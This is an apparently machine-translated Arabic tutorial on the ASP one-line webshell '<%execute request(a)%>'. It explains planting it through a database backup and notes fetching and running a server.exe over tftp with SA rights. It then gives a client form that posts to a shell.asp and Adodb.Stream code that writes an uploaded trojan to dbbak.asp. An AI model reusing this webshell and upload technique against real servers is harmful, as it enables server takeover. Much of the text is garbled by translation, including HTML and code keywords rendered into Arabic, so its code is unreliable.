يتم إدراج حصان طروادة المكون من جملة واحدة في ملف ASP: بالطبع، حصان طروادة المكون من جملة واحدة هو ملف ASP. يمكن الوصول إليها باستخدام IE: فقط إذا كان من الممكن الوصول إليها، فيمكننا إرسال البيانات طالما أنه يمكن الوصول إليها
الوصول عبر بروتوكول HTTP
في جملة واحدة، نطاق استخدام أحصنة طروادة (لقد أدرجت نوعين فقط):
1) مطلوب فقط النسخ الاحتياطي لقاعدة البيانات
عند عمل نسخة احتياطية من قاعدة البيانات في ملف asp، لا يحدث أي خطأ في الترجمة، وتكون علامة إغلاق البرنامج النصي مفقودة %>
2) عند تعيين أذونات SA، عادةً ما تكتب جملة أولاً للراحة (بالطبع، من الأسرع تحميل الحمام مباشرة عبر tftp وتشغيله).
tftp -i ip احصل على server.exe
مبدأ حصان طروادة <%execute request(a)%> في جملة واحدة:
تعرف أولا
تُستخدم وظيفة التنفيذ () لتنفيذ تعليمات برمجية asp وهي مسؤولة عن تنفيذ الحصان الذي قمنا بتحميله وتمريره إلى asp.dll لتحليله. يمكن شرح الكود أعلاه <%execute request(a)%> على النحو التالي:
<%
إذا كان الطلب (أ) <> ثم قم بتنفيذ الطلب (أ)
%>
إذا لم يكن فارغًا، فسيتم تنفيذه؟
إذا كان! = 0
دعونا نلقي نظرة على العميل:
<إجراء النموذج=http://192.168.0.28/shell.asp الطريقة=post>
<اسم منطقة النص=l cols=120 صفًا=10 عرض=45>
تعيين lP=server.CreateObject(Adodb.Stream) 'إنشاء مكون Adodb.Stream..
lP.Open
ل.ب. النوع = 2
lP.CharSet=gb2312
طلب lP.writetext(ع)
lP.SaveToFile server.mappath(dbbak.asp),2
lP.Close
ضبط lP = لا شيء
استجابة. إعادة توجيه dbbak.asp
</textarea>
<textarea name=p cols=120rows=10 width=45>البيانات المطلوب إرسالها</textarea><BR><center><br>
<نوع الإدخال=قيمة الإرسال=إرسال>
Adodb.Stream مسؤول عن تحميل بيانات القراءة إلى الخادم:
المكون: Adodb.Stream
هناك الطرق التالية:
طريقة الإلغاء
كيفية استخدامه
كائن.إلغاء
الوصف: إلغاء تنفيذ استدعاء أسلوب التنفيذ أو الفتح غير المتزامن المعلق.
طريقة كتابة النص
كيفية استخدامه:
Object.Write(البيانات،[خيارات])
الوصف: قم بتحميل البيانات النصية المحددة في الكائن.
وصف المعلمة: البيانات هي المحتوى المحدد المراد كتابته.
خيارات خيارات الكتابة، والتي يمكن تركها غير محددة المعلمات الاختيارية هي كما يلي:
adWriteChar =0
adWriteLine =1
طريقة SaveToFile
كيفية استخدامه:
Object.SaveToFile(اسم الملف،[خيارات])
الوصف: اكتب محتويات الكائن إلى الملف المحدد بواسطة FileName
أي أن اسم الملف الذي نحفظ فيه حصان طروادة هو dbbak.asp
وصف المعلمة: الملف المحدد بواسطة FileName
خيارات الوصول إلى الخيارات، والتي يمكن تركها غير محددة، المعلمات الاختيارية هي كما يلي:
adSaveCreateNotExist =1
adSaveCreateOverWrite =2
بعد إرسال جملة طروادة، تكون قيمة a فارغة وتنتظر القيمة المكتوبة، أما الوصول إلى http://www.***.com/**.asp فهو عملية الانتظار. ) وظيفة.. .
قم بإنشاء Adodb.Stream، المسؤول عن كتابة بياناتنا إلى الخادم...
وفي الوقت نفسه، يحدد المتغير SaveToFile المحدد بواسطة هذا المكون اسمنا الماليزي..dbbak.asp
بعد الإرسال إلى الخادم، تكتشف الدالة Execute () أن قيمة a ليست فارغة، لذلك تقوم بتنفيذ ماليزيا!